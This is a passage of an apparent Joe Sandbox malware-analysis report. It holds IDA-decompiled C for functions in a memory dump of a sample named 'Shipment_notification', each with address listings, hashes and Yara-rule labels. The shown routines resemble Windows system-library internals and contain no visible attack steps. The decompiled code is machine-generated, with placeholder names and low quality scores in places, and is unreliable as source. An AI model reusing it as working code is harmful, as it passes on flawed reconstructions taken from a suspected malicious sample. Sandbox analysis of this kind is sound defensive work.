								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01AE7055(_t31 + 0xfffffff8);
								_t24 =  *0x1bd87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x1bd87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1bd5cd0;
				if( *0x1bd5cd0 <= 0) {
					L01AE7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x1bd87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x1bd87e8 = _t30;
						 *0x1bd87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E01B3D0D1(L01B74320());
			}















                                                                                0x01b74257
                                                                                0x01b74257
                                                                                0x01b74257
                                                                                0x01b74259
                                                                                0x01b7425e
                                                                                0x01b74263
                                                                                0x01b74265
                                                                                0x01b74273
                                                                                0x01b74278
                                                                                0x01b7427c
                                                                                0x01b7427f
                                                                                0x01b74281
                                                                                0x01b74287
                                                                                0x01b742d7
                                                                                0x01b742d7
                                                                                0x01b742da
                                                                                0x01b7428d
                                                                                0x01b7428d
                                                                                0x01b7428f
                                                                                0x01b74292
                                                                                0x01b74297
                                                                                0x01b7429c
                                                                                0x01b742a0
                                                                                0x01b742a6
                                                                                0x01b742a8
                                                                                0x01b742ae
                                                                                0x01b742b3
                                                                                0x00000000
                                                                                0x01b742ba
                                                                                0x01b742ba
                                                                                0x01b742bf
                                                                                0x01b742c5
                                                                                0x01b742ca
                                                                                0x01b742cf
                                                                                0x01b742d0
                                                                                0x00000000
                                                                                0x01b742d0
                                                                                0x01b742b3
                                                                                0x00000000
                                                                                0x01b742a6
                                                                                0x01b7429c
                                                                                0x01b742dc
                                                                                0x01b742dc
                                                                                0x01b742e3
                                                                                0x01b74309
                                                                                0x01b742e5
                                                                                0x01b742e5
                                                                                0x01b742e8
                                                                                0x01b742ee
                                                                                0x01b742f0
                                                                                0x00000000
                                                                                0x01b742f2
                                                                                0x01b742f2
                                                                                0x01b742f4
                                                                                0x01b742f7
                                                                                0x01b742f9
                                                                                0x01b74300
                                                                                0x01b74300
                                                                                0x01b742f0
                                                                                0x01b7430e
                                                                                0x01b7431f

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fc8898331360f61eb648590ca3d255c647a9c70e3ff4a5982aaf4e4ba5fc830d
                                                                                • Instruction ID: 728a4f52bc15415cbac1230f2e7c7312b29345a993387bcab46eae8ebf5c0bf4
                                                                                • Opcode Fuzzy Hash: fc8898331360f61eb648590ca3d255c647a9c70e3ff4a5982aaf4e4ba5fc830d
                                                                                • Instruction Fuzzy Hash: 1D218E70612602CFCB2EEF68D150A14BBF1FB85317B5682EED1298B265E731D465CF41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B12397 Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 25%
                                                                                			E01B12397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x1bd848c != 0) {
					L01B0FAD0(0x1bd8610);
					if( *0x1bd848c == 0) {
						E01B0FA00(0x1bd8610, _t19, _t27, 0x1bd8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01B12581(0x1bd8610, 0x1ac50a0, _t26, _t27, _t28);
						E01B0FA00(0x1bd8610, 0x1ac50a0, _t27, 0x1bd8610);
					}
				} else {
					L1:
					_t11 =  *0x1bd8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01B24886(0x1ac1088, 1, 0x1bd8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01B12581(0x1bd8610, (_t11 << 4) + 0x1ac5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                0x01b123b0
                                                                                0x01b123b6
                                                                                0x01b12409
                                                                                0x01b12415
                                                                                0x01b55ae9
                                                                                0x00000000
                                                                                0x01b1241b
                                                                                0x01b1241b
                                                                                0x01b1241d
                                                                                0x01b12427
                                                                                0x01b1242e
                                                                                0x01b12430
                                                                                0x01b12430
                                                                                0x01b123b8
                                                                                0x01b123b8
                                                                                0x01b123b8
                                                                                0x01b123bf
                                                                                0x01b123fc
                                                                                0x01b123fc
                                                                                0x01b123c1
                                                                                0x01b123c3
                                                                                0x01b123d0
                                                                                0x01b123d8
                                                                                0x01b123d8
                                                                                0x01b123dc
                                                                                0x01b123de
                                                                                0x01b123e1
                                                                                0x01b123e1
                                                                                0x01b123ec

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6a4e4151d0a38fefe16cfb2880dfe1b1773dee0fd96fc6ddf81c2480677c600f
                                                                                • Instruction ID: af336ffecef6325fd5096208443bbdc93059bd9981ec67686671202225d3b421
                                                                                • Opcode Fuzzy Hash: 6a4e4151d0a38fefe16cfb2880dfe1b1773dee0fd96fc6ddf81c2480677c600f
                                                                                • Instruction Fuzzy Hash: 82112B317003016BE73D9629BCC0F25B6D8FB60621F6545EEF602D7295D7B0E8418754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B646A7 Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E01B646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E01B2F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E01B1D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L01B077F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                0x01b646b7
                                                                                0x01b646ba
                                                                                0x01b646c5
                                                                                0x01b646c8
                                                                                0x01b646d0
                                                                                0x01b646d4
                                                                                0x01b646e6
                                                                                0x01b646e9
                                                                                0x01b646f4
                                                                                0x01b646ff
                                                                                0x01b64705
                                                                                0x01b64706
                                                                                0x01b6470c
                                                                                0x01b64713
                                                                                0x01b6471b
                                                                                0x01b64723
                                                                                0x01b64725
                                                                                0x01b646d6
                                                                                0x01b646d9
                                                                                0x01b646db
                                                                                0x01b646db
                                                                                0x01b64732

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                • Instruction ID: 18c39cb8679f569a8f23ddcc710ab026a94948d328ba85d45e4466b392da0f94
                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                • Instruction Fuzzy Hash: 7C11E572504608BBCB0A9F5CD9808BEBBB9EFA5310F1080AEF984C7351DB359D55D7A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEC962 Relevance: .1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 42%
                                                                                			E01AEC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x1bdd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E01AFEEF0(0x1bd70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L01B6F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E01AFEB70(_t29, 0x1bd70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L01B2B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E01B6F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x1bd70c0; // 0x0
					while(_t38 != 0x1bd70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x1bdb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                0x01aec96a
                                                                                0x01aec974
                                                                                0x01aec988
                                                                                0x01aec98a
                                                                                0x01b57c9d
                                                                                0x01b57c9f
                                                                                0x01b57ca4
                                                                                0x01b57cae
                                                                                0x01b57cf0
                                                                                0x01b57cf5
                                                                                0x01b57cfa
                                                                                0x01aec992
                                                                                0x01aec996
                                                                                0x01aec997
                                                                                0x01aec998
                                                                                0x01aec9a3
                                                                                0x01aec9a3
                                                                                0x01b57cb0
                                                                                0x01b57cb7
                                                                                0x01b57cbb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b57cbd
                                                                                0x01b57ce8
                                                                                0x01b57cc5
                                                                                0x01b57cc8
                                                                                0x01b57cca
                                                                                0x01b57cd0
                                                                                0x01b57cd6
                                                                                0x01b57cde
                                                                                0x01b57ce4
                                                                                0x01b57ce4
                                                                                0x01b57cd0
                                                                                0x00000000
                                                                                0x01b57ce8
                                                                                0x01aec990
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b17a0bb21eb73fa23b9d523ef852364d3317e63b9ac172c5cefea2242ea4432
                                                                                • Instruction ID: 62ae9d52ced2b69460cd67e54264316421726461a2cfb60a3562e1567d24da4e
                                                                                • Opcode Fuzzy Hash: 0b17a0bb21eb73fa23b9d523ef852364d3317e63b9ac172c5cefea2242ea4432
                                                                                • Instruction Fuzzy Hash: D31102313006469BCB6DAF2DD894A6A77F5FB88214B8001ADFD45836A0EF20EC10C7D1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B237F5 Relevance: .1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E01B237F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01B02280(_t6, 0x1bd8550);
				}
				_t29 = E01B2387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E01AFFFB0(0x1bd8550, _t27, 0x1bd8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                0x01b237fa
                                                                                0x01b237fc
                                                                                0x01b23805
                                                                                0x01b23808
                                                                                0x01b23808
                                                                                0x01b23814
                                                                                0x01b23818
                                                                                0x01b23846
                                                                                0x01b23848
                                                                                0x01b2384b
                                                                                0x01b2384b
                                                                                0x01b23852
                                                                                0x00000000
                                                                                0x01b23854
                                                                                0x01b23856
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b23863
                                                                                0x00000000
                                                                                0x01b23863
                                                                                0x01b2381a
                                                                                0x01b2381a
                                                                                0x01b2381f
                                                                                0x01b2386e
                                                                                0x01b2386e
                                                                                0x01b23871
                                                                                0x01b23873
                                                                                0x01b23873
                                                                                0x01b23868
                                                                                0x00000000
                                                                                0x01b23868
                                                                                0x01b23821
                                                                                0x01b23826
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b23828
                                                                                0x01b2382a
                                                                                0x01b23841
                                                                                0x00000000
                                                                                0x01b23841

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d54b77f1f3a05c34bc8bdf1c734fd4956b736bf1b71e36a9aebfbb7ffa8f1e8
                                                                                • Instruction ID: bb17b6b2ba83210effa078dee4e346ac20cf70763648cbda2d95683116e04832
                                                                                • Opcode Fuzzy Hash: 7d54b77f1f3a05c34bc8bdf1c734fd4956b736bf1b71e36a9aebfbb7ffa8f1e8
                                                                                • Instruction Fuzzy Hash: 7201C4729016219BC33F8A5D9940A26BBE6FF8DA5071540E9E94D8F225DB78D845CBC0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1002D Relevance: .1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B1002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01B07D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01B07D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01B07D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01B07D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                0x01b10032
                                                                                0x01b10037
                                                                                0x01b10043
                                                                                0x01b54b3a
                                                                                0x01b10049
                                                                                0x01b10049
                                                                                0x01b10049
                                                                                0x01b1004e
                                                                                0x01b10053
                                                                                0x01b54b48
                                                                                0x01b54b5a
                                                                                0x01b54b4a
                                                                                0x01b54b53
                                                                                0x01b54b53
                                                                                0x01b54b5f
                                                                                0x00000000
                                                                                0x01b54b61
                                                                                0x00000000
                                                                                0x01b54b61
                                                                                0x01b10059
                                                                                0x01b10059
                                                                                0x01b10060
                                                                                0x01b54b6f
                                                                                0x01b54b6f
                                                                                0x01b10069
                                                                                0x01b54b83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54b90
                                                                                0x01b54b9b
                                                                                0x01b54b9b
                                                                                0x01b54ba4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54baa
                                                                                0x00000000
                                                                                0x01b1006f
                                                                                0x01b1006f
                                                                                0x00000000
                                                                                0x01b1006f
                                                                                0x01b10069

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                • Instruction ID: 89c7dce598ee312bace47afb78fe21e1e294d84854d4a6382d12075e706935f4
                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                • Instruction Fuzzy Hash: 5E11D6726056858FE76BA72CC948B357BD5EF45754F0A01E0EE44C7693FB28D8C1C260
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE9080 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 69%
                                                                                			E01AE9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x1bd85ec;
				E01B02280(_t48, 0x1bd85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E01AFFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x1bd538c; // 0x771a6828
					if( *_t84 != 0x1bd5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x1bbf6e8);
						E01B3D0E8(0x1bd85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E01BB88F5(_t80, _t85, 0x1bd5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x1bd86c0; // 0x15807b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x1bd86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01B02280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E01BB88F5(0x1bd85ec, _t85, 0x1bd5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E01B2AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x1bdb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x1bd84c0;
																			if(_t82 >=  *0x1bd84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01BB9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E01AE922A(_t99);
										_t64 = E01B07D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01BB8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x1bd86c0; // 0x15807b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x1bd86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x1bd86bc;
													_t87 = 0x1bd86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01AE9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x1bd86c4;
												_t87 = 0x1bd86c0;
												L27:
												E01B19B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E01B3D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1bd5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x1bd538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                0x01ae9082
                                                                                0x01ae9083
                                                                                0x01ae9084
                                                                                0x01ae9085
                                                                                0x01ae9087
                                                                                0x01ae9096
                                                                                0x01ae9098
                                                                                0x01ae9098
                                                                                0x01ae909e
                                                                                0x01ae90a8
                                                                                0x01ae90e7
                                                                                0x01ae90e7
                                                                                0x01ae90aa
                                                                                0x01ae90b0
                                                                                0x01ae90b7
                                                                                0x01ae90bd
                                                                                0x01ae90dd
                                                                                0x01ae90e6
                                                                                0x01ae90bf
                                                                                0x01ae90bf
                                                                                0x01ae90c7
                                                                                0x01ae90cf
                                                                                0x01ae90f1
                                                                                0x01ae90f2
                                                                                0x01ae90f4
                                                                                0x01ae90f5
                                                                                0x01ae90f6
                                                                                0x01ae90f7
                                                                                0x01ae90f8
                                                                                0x01ae90f9
                                                                                0x01ae90fa
                                                                                0x01ae90fb
                                                                                0x01ae90fc
                                                                                0x01ae90fd
                                                                                0x01ae90fe
                                                                                0x01ae90ff
                                                                                0x01ae9100
                                                                                0x01ae9102
                                                                                0x01ae9107
                                                                                0x01ae910c
                                                                                0x01ae9110
                                                                                0x01ae9113
                                                                                0x01ae9115
                                                                                0x01ae9136
                                                                                0x01ae913f
                                                                                0x01ae9143
                                                                                0x01b437e4
                                                                                0x01b437e4
                                                                                0x01ae9117
                                                                                0x01ae9117
                                                                                0x01ae911d
                                                                                0x00000000
                                                                                0x01ae911f
                                                                                0x01ae911f
                                                                                0x01ae9125
                                                                                0x00000000
                                                                                0x01ae9127
                                                                                0x01ae912d
                                                                                0x01ae9130
                                                                                0x01ae9134
                                                                                0x01ae9158
                                                                                0x01ae915d
                                                                                0x01ae9161
                                                                                0x01ae9168
                                                                                0x01b43715
                                                                                0x01ae916e
                                                                                0x01ae916e
                                                                                0x01ae9175
                                                                                0x01ae9177
                                                                                0x01ae917e
                                                                                0x01ae917f
                                                                                0x01ae9182
                                                                                0x01ae9182
                                                                                0x01ae9187
                                                                                0x01ae9187
                                                                                0x01ae918a
                                                                                0x01ae918d
                                                                                0x01ae918f
                                                                                0x01ae9192
                                                                                0x01ae9195
                                                                                0x01ae9198
                                                                                0x01ae9198
                                                                                0x01ae9198
                                                                                0x01ae919a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b4371f
                                                                                0x01b43721
                                                                                0x01b43727
                                                                                0x01b4372f
                                                                                0x01b43733
                                                                                0x01b43735
                                                                                0x01b43738
                                                                                0x01b4373b
                                                                                0x01b4373d
                                                                                0x01b43740
                                                                                0x00000000
                                                                                0x01b43746
                                                                                0x01b43746
                                                                                0x01b43749
                                                                                0x00000000
                                                                                0x01b4374f
                                                                                0x01b4374f
                                                                                0x01b43751
                                                                                0x01b43757
                                                                                0x01b43759
                                                                                0x01b4375c
                                                                                0x01b4375c
                                                                                0x01b4375e
                                                                                0x01b4375e
                                                                                0x01b43761
                                                                                0x01b43764
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43766
                                                                                0x01b43768
                                                                                0x01b437a3
                                                                                0x01b437a3
                                                                                0x01b437a5
                                                                                0x01b437a7
                                                                                0x01b437ad
                                                                                0x01b437b0
                                                                                0x01b437b2
                                                                                0x01b437bc
                                                                                0x01b437c2
                                                                                0x01b437c2
                                                                                0x01b437b2
                                                                                0x01ae9187
                                                                                0x01ae9187
                                                                                0x01ae918a
                                                                                0x01ae918d
                                                                                0x01ae918f
                                                                                0x01ae9192
                                                                                0x01ae9195
                                                                                0x00000000
                                                                                0x01ae9195
                                                                                0x00000000
                                                                                0x01b4376a
                                                                                0x01b4376a
                                                                                0x01b4376a
                                                                                0x01b4376c
                                                                                0x01b4376c
                                                                                0x01b4376f
                                                                                0x01b43775
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43777
